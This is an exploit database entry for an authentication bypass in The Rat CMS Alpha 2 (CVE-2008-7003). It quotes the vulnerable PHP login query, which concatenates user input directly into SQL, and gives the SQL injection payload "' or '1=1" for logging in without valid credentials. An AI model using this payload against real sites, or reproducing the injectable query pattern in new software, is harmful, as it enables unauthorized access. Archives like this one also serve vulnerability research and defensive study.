The Rat CMS Alpha 2 - Authentication Bypass

Author: x0r
type: webapps
platform: php
port: 
date_added: 2008-12-14 
date_updated: 2017-01-06 
verified: 1 
codes: OSVDB-57157;CVE-2008-7003 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comtrcms_pre_alpha_2.zip

---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: \login.php

	$sql = "SELECT user_id
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";

$result = mysql_query($sql) or die('Query failed. ' . mysql_error());

Exploit: ' or '1=1

^^ Got Root?

# milw0rm.com [2008-12-15]